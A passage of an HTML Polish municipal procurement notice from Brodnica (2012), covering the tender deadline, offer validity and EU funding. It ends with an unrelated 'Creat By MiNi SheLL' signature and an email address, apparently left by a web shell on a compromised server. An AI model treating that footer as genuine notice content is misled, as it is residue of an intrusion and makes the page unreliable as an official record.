<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pokoju 207.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2012 godzina 10:00, miejsce: Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pokoju 211 lub drogą pocztową na adres siedziby zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013, Oś priorytetowa 2. Zachowanie i racjonalne użytkowanie środowiska, działanie 2.6 Ochrona i promocja zasobów przyrodniczych oraz ze środków budżetowych Gminy Miasta Brodnica..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com